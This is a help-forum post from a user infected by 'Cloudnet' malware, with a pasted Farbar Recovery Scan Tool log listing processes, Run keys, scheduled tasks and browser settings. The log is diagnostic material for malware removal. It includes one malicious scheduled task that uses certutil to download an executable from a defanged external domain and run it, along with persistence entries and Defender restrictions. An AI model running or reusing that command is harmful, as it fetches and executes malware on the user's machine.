Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Cloudnet infection

clodnet browser new wind

  • Please log in to reply

#1
spra

spra

    Member

  • Member
  • PipPip
  • 78 posts

After a suspicious download windows defender found some threats. I let it clean them and rebooted. Upon rebooting the defender found them again and I removed them again. The next time it did not ask to remove anything and showed the removed threats. I attempted to run Malwarebytes but each time I try I get a message saying "Windows cannot access the specified device, path or file. You may have not access...". Which is also a new thing caused obviously by the infection. The next (new) problem is that in my installed programs list I see one called Cloudnet, which was installed today unintentionally. When I click to uninstall it a dos window appears with some Russian(?) characters which I cannot understand. If I click Enter the window goes away but the program remains installed. The other symptom is that whatever is installed, it opens Firefox windows every few minutes. I am not sure that I have understood your instructions about attaching files, Is it attaching thise 2 files or copy-pasting the texts here? So I think I will do both, This is partly because the connection is not so good right now and I am having a hard time to communicate with you properly. For example the first times I tried to write this text, there was no text box to write onto. It appeared just some minutes ago after a few attempts to reload the page and finally I can write this to you. Thank you in advance for any help.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-11-2019
Ran by SR (administrator) on DESKTOP-A0OS1Q6 (Gigabyte Technology Co., Ltd. To be filled by O.E.M.) (24-11-2019 19:50:32)
Running from D:\Users\SR\Downloads
Loaded Profiles: SR (Available Profiles: SR & Administrator)
Platform: Windows 10 Pro Version 1803 17134.345 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

( ) [File not signed] C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe
() [File not signed] C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe
() [File not signed] C:\Users\SR\AppData\Local\Temp\is-FML3U.tmp\Guitar.tmp
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Brio) [File not signed] C:\Program Files\FolderSize\FolderSizeSvc.exe
(Creative Labs Inc -> Creative Technology Ltd) C:\Windows\SysWOW64\CtHelper.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(IDRIX -> IDRIX) C:\Program Files\VeraCrypt\VeraCrypt.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieCtrl.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Logitech Inc -> Logitech) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\NisSrv.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(PACE Anti-Piracy, Inc. -> PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
(Polenter - Pawel Idzikowski -> Polenter - Software Solutions) C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(WinAbility Software Corporation -> WinAbility® Software Corporation) C:\Program Files\IconShepherd\ISEXE64.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1605856 2019-08-18] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech -> Logitech, Inc.)
HKLM\...\Run: [AsioReg] => REGSVR32.EXE /S CTASIO.DLL*
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2176648 2018-06-18] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3136136 2019-01-30] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6260544 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL
HKLM-x32\...\Run: [CTHelper] => C:\Windows\SysWOW64\CTHELPER.EXE* [23040 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [CTxfiHlp] => C:\Windows\SysWOW64\CTXFIHLP.EXE* [23552 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645648 2019-10-05] (Oracle America, Inc. -> Oracle Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\ DisallowedCertificates: 7D4EAFF45C5D8A3E9AB24486D12F4B4F7F4DBB60 (U)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3199776 2018-04-03] (Valve -> Valve Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [DesktopReminder2ByPolenter] => C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe [3164048 2017-06-21] (Polenter - Pawel Idzikowski -> Polenter - Software Solutions)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [SandboxieControl] => C:\Program Files\Sandboxie\SbieCtrl.exe [3682968 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Viber] => C:\Users\SR\AppData\Local\Viber\Viber.exe [38564936 2019-10-30] (Viber Media S.à r.l. -> Viber Media S.à r.l.)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [GreenResonance] => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [7890540] => C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe [877745 2019-11-24] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [CloudNet] => C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-24] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKLM\Software\...\Authentication\Credential Providers: [{AA96996E-48DD-4D31-A94D-8563298A8C2D}] -> C:\WINDOWS\system32\WACP.dll [2016-09-20] (Softomotive Ltd -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Icon Shepherd.lnk [2019-10-31]
ShortcutTarget: Icon Shepherd.lnk -> C:\Program Files\IconShepherd\ISEXE64.exe (WinAbility Software Corporation -> WinAbility® Software Corporation)
GroupPolicy: Restriction - Firefox <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0E55825A-221F-4E7A-9416-6D13AA06ABD8} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {12152F8B-CD2F-42DE-A539-041A8A936465} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {14324AB2-DEA1-4205-8D09-E4BC117610AE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {15D1F9B6-04A3-4972-A83C-EF0F4BBB8427} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {1B9C5A1B-9321-46BB-84C5-DF45191FF376} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [648504 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2208EA4A-30D8-45CC-8BDD-7FC3B05195B5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {42596E64-0421-415A-9C21-4EC99F971F53} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {42CF4929-54EE-42D2-B729-F538516C85C2} - System32\Tasks\JumpingBytes\PureSyncVSS => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncVSSStart.exe [35656 2016-06-16] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
Task: {66B093E3-0989-45FD-B21D-EE39713B7201} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe
Task: {78A0CAD1-8991-4E6C-966D-4E69097977E8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7F8AE7BB-B4DE-4B22-9729-1E5E19704D1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {881D3DFF-B43A-44C2-820D-F54679FAE900} - System32\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {93894B49-495F-4FF7-A834-F07A572C2C25} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {950BA929-9185-474B-B254-40BA3B8E3A1B} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {962642C0-4430-4032-92EE-908F3A5F3E52} - System32\Tasks\ExclusiveTool => C:\Program Files (x86)\DSDCS\InputMapper\ExclusiveModeTool.exe [19968 2016-10-04] (InputMapper) [File not signed]
Task: {99C2988F-4978-44CF-9C99-C8698A7E4DD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {9FAB49BF-9A8A-43A8-A5BF-493EE72EF726} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {A197B1E1-5017-44E1-8786-700A5A077A97} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {A2CB4A3E-AFDC-43FA-98BA-0A92F7E5DABE} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A809944B-8D1B-4F63-BB06-E2CD920F61A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {AD74C57C-54F0-4805-B7A0-CB5A9FA03223} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {B264C95D-A9B6-4D69-9B94-FB67D6DB757E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {B69A753B-777A-4C1E-AA9D-1033C77839DE} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK
Task: {B6C27676-7B71-492F-BB86-892E15752F97} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
Task: {C68E190A-5D0C-40B1-895A-9522150D9369} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C789D50A-A2A0-405F-B279-A59DBA0D126E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {CCC37DAD-9377-4ED5-80DB-F21C8D60E2E6} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D34CA7D5-150E-4A42-9C1F-D72B477043A6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {DC559262-3918-4E5A-B027-44ED71265B49} - System32\Tasks\JumpingBytes\PureSyncExit => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncAdmin.exe [105808 2018-11-12] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
Task: {E02831A3-E4D2-410D-9AAC-0268EE1483DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F1C3AFE7-5B89-4B71-8D62-12804C3764B1} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F7413A74-A9B1-4E6A-91D4-0570477CA0ED} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3787304 2019-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F9DCD18B-6730-49E0-8339-A8013E910822} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {FEF2A145-6CB7-48B3-827C-4FFCF30E20F1} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE:/EXE:{3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} /F:UpdateWORKGROUP\DESKTOP-A0OS1Q6$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-3967059023-4107875624-2872843465-1001] => http=127.0.0.1:8888;
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{2a8e95f9-250a-4cdc-8d08-f661e3f2a913}: [DhcpNameServer] 1.1.1.1 1.0.0.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_231\bin\ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_231\bin\jp2ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: qyonbq05.default-1454591260015
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release [2019-11-24]
FF Notifications: Mozilla\Firefox\Profiles\dho1fb01.default-release -> hxxps://mail-notification.info
FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-10-27]
FF Extension: (Skip Redirect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-11-15]
FF Extension: (Adblocker Lite) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\{3596f810-bf50-47e2-b54a-2128ebdc5179}.xpi [2019-06-05]
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 [2019-11-24]
FF DownloadDir: D:\Users\SR\Downloads
FF NewTab: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> about:newtab
FF NetworkProxy: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> type", 0
FF Notifications: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> hxxps://mail-notification.info
FF Extension: (Disconnect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-15]
FF Extension: (Grammarly for Firefox) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-02-04]
FF Extension: (AdGuard AdBlocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-17]
FF Extension: (Block Site) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{54e2eb33-18eb-46ad-a4e4-1329c29f6e17}.xpi [2019-05-01]
FF Extension: (Adblock Plus - free ad blocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-20]
FF Extension: (No Name) - C:\Program Files\Mozilla Firefox\browser\features\{EBA45A79-A229-44D3-A606-3DADEAC6A066}.xpi [2019-08-11] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2019-10-19] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin: @java.com/DTPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\dtplugin\npDeployJava1.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
